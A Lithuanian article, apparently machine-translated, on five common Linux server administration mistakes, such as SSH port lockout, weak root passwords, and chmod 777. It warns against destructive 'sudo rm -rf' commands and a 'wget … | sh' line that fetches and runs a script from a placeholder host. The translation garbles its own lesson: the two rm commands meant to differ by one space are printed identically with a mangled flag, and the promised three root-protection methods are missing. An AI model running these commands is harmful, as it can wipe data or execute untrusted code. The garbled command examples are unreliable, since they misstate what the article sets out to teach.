„Linux“ komandos

Penkios „Linux Server“ administravimo klaidos ir kaip jų išvengti

Penkios „Linux Server“ administravimo klaidos ir kaip jų išvengti
2017 m. Versijų valdymo prieglobos platformos „GitLab“ darbuotojo buvo paprašyta pakartoti gamybos duomenų bazę. Dėl konfigūracijos klaidos replikacija neveikė taip, kaip tikėtasi, todėl darbuotojas nusprendė pašalinti perduotus duomenis ir bandyti dar kartą. Jis vykdė komandą, norėdamas ištrinti nepageidaujamus duomenis, tik su dideliu siaubu suprato, kad komandą įvedė į SSH sesiją, prijungtą prie gamybos serverio, ištrindamas šimtus gigabaitų vartotojo duomenų. Kiekvienas patyręs sistemos administratorius gali pasakyti jums panašią istoriją.

„Linux“ komandų eilutė suteikia serverio administratoriams galimybę kontroliuoti savo serverius ir juose saugomus duomenis, tačiau tai mažai trukdo jiems vykdyti destruktyvias komandas su pasekmėmis, kurių negalima anuliuoti. Atsitiktinis duomenų ištrynimas yra tik viena iš klaidų, kurias daro nauji serverių administratoriai.

Klavišų užrakinimas viduje

Serverių administratoriai prisijungia prie serverių naudodami SSH - paslaugą, paprastai veikiančią 22 prievade, suteikdami prisijungimo apvalkalą, per kurį autentifikuoti vartotojai gali vykdyti komandas nuotoliniuose serveriuose. Standartinis saugumo grūdinimo žingsnis yra konfigūruoti SSH priimti ryšius kitame prievade. SSH perkėlimas į daugybę atsitiktinių prievadų riboja žiaurių jėgų atakų poveikį; įsilaužėliai negali bandyti kenkėjiškų prisijungimų, kai negali rasti prievado, kuriame klausosi SSH.

Tačiau administratorius, sukonfigūravęs SSH klausytis kitame prievade ir iš naujo paleidęs SSH serverį, gali pastebėti, kad ne tik įsilaužėliai yra užrakinti. Jei serverio užkarda taip pat nėra perkonfigūruota leisti prisijungti prie naujojo prievado, bandymai prisijungti niekada nepasieks SSH serverio. Administratorius bus užrakintas iš savo serverio ir niekaip negalės išspręsti problemos, išskyrus tai, kad atidarė palaikymo bilietą su savo prieglobos paslaugų teikėju. Jei pakeisite SSH prievadą, būtinai atidarykite naują prievadą savo serverio užkardos konfigūracijoje.

Lengvai atspėjamo slaptažodžio pasirinkimas

Žiaurios jėgos išpuoliai yra spėlionių žaidimas. Užpuolikas bando daugelį naudotojų vardų ir slaptažodžių, kol pasiekia kombinaciją, leidžiančią juos įvesti. Žodyno ataka yra patobulintas metodas, naudojant slaptažodžių sąrašus, dažnai pašalinamus iš nutekintų slaptažodžių duomenų bazių. Užpuolimai prieš šakninę paskyrą yra lengvesni nei prieš kitas paskyras, nes užpuolikas jau žino vartotojo vardą. Jei šakninėje paskyroje yra paprastas slaptažodis, ją galima nulaužti per trumpą laiką.

Yra trys būdai, kaip apsisaugoti nuo žiaurios jėgos ir žodynų atakų prieš root paskyrą.

Kopijuokite nesuprantamas komandas

„Stack Exchange“, „Server Fault“ ir panašios svetainės yra gelbėjimosi ratas naujiems „Linux“ sistemos administratoriams, tačiau turėtumėte vengti pagundos nukopijuoti ir įklijuoti nesuprantamą apvalkalo komandą. Kuo skiriasi šios dvi komandos?

sudo rm -rf --no-säilitada-root / mnt / mydrive /
sudo rm -rf --no-säilitada-root / mnt / mydrive /

Lengva pamatyti, kai jie rodomi kartu, bet ne taip lengva, kai ieškote forumuose ir ieškote komandos ištrinti prijungto tomo turinį. Pirmoji komanda ištrina visus failus iš prijungto disko. Antroji komanda ištrina tuos failus ir viską, kas yra serverio šakninių failų sistemoje. Vienintelis skirtumas yra vieta prieš paskutinį pasvirąjį brūkšnį.

Serverio administratoriai gali susidurti su ilgomis komandomis su vamzdynais, kurie, sakoma, daro vieną, bet visai ką nors kita. Būkite ypač atsargūs su komandomis, kurios atsisiunčia kodą iš interneto.

wget http: // pavyzdys.com / verybadscript -O - | sh -

Ši komanda naudoja wget norėdama atsisiųsti scenarijų, kuris yra prijungtas prie apvalkalo ir vykdomas. Norėdami tai paleisti saugiai, turite suprasti, ką daro komanda, ir ką daro atsisiųstas scenarijus, įskaitant bet kokį kodą, kurį atsisiųstas scenarijus gali pats atsisiųsti.

Prisijungimas kaip root

Paprasti vartotojai gali keisti failus tik savo namų aplanke, tačiau mažai ką root vartotojas negali padaryti „Linux“ serveryje. Tai gali paleisti bet kokią programinę įrangą, nuskaityti bet kokius duomenis ir ištrinti bet kokį failą.

Šakninio vartotojo valdomos programos turi panašią galią. Patogu būti prisijungus kaip root vartotojui, nes jums nereikia nuolat „sudo“ ar „su“, bet tai pavojinga. Klaida gali sugadinti jūsų serverį per kelias sekundes. Buggy programinė įranga, kurią valdo pagrindinis vartotojas, gali sukelti katastrofą. Jei norite atlikti kasdienes operacijas, prisijunkite kaip paprastas vartotojas ir pasinaudokite pagrindinėmis teisėmis tik prireikus.

Nežinote failų sistemos leidimų

Failų sistemos leidimai gali būti painūs ir varginantys naujus „Linux“ vartotojus. Leidimų eilutė, pvz., „Drwxr-xr-x“, iš pradžių atrodo beprasmė, o leidimai gali sustabdyti failų modifikavimą ir sustabdyti programinę įrangą daryti tai, ko norite.

Sistemos administratoriai greitai sužino, kad „chmod 777“ yra stebuklingas užkalbėjimas, kuris išsprendžia daugumą šių problemų, tačiau tai yra baisi idėja. Tai leidžia visiems, turintiems paskyrą, skaityti, rašyti ir vykdyti failą. Jei vykdote šią komandą žiniatinklio serverio kataloge, prašote būti nulaužtas. „Linux“ failų leidimai atrodo sudėtingi, tačiau jei užtruksite kelias minutes, kad sužinotumėte, kaip jie veikia, atrasite logišką ir lanksčią sistemą, pagal kurią kontroliuojamas failų prieiga.

Laikmetyje, kuris vertina paprastą vartotojo patirtį, palyginti su visais kitais veiksniais, „Linux“ komandinė eilutė išlieka ryžtingai sudėtinga ir atspari supaprastinimui. Jūs negalite suklaidinti ir tikėtis, kad viskas bus gerai. Tai nebus gerai, ir jūs pateksite į nelaimę ant rankų.

Bet jei sužinosite pagrindus - failų teises, komandų eilutės įrankius ir jų parinktis, geriausią saugumo praktiką - galite tapti vienos iš galingiausių kada nors sukurtų skaičiavimo platformų meistru.

5 geriausios žaidimų fiksavimo kortos
Visi mes matėme ir pamėgome srautinius žaidimus „YouTube“. „PewDiePie“, „Jakesepticye“ ir „Markiplier“ yra tik vieni iš geriausių žaidėjų, kurie uždir...
Kaip sukurti žaidimą „Linux“
Prieš dešimtmetį nedaugelis „Linux“ vartotojų numatė, kad jų mėgstama operacinė sistema vieną dieną bus populiari komercinių vaizdo žaidimų žaidimų pl...
Atvirojo kodo komercinių žaidimų variklių uostai
Nemokami atvirojo kodo ir įvairių platformų žaidimų varikliai gali būti naudojami žaidžiant senus ir kai kuriuos gana naujus žaidimų pavadinimus. Šiam...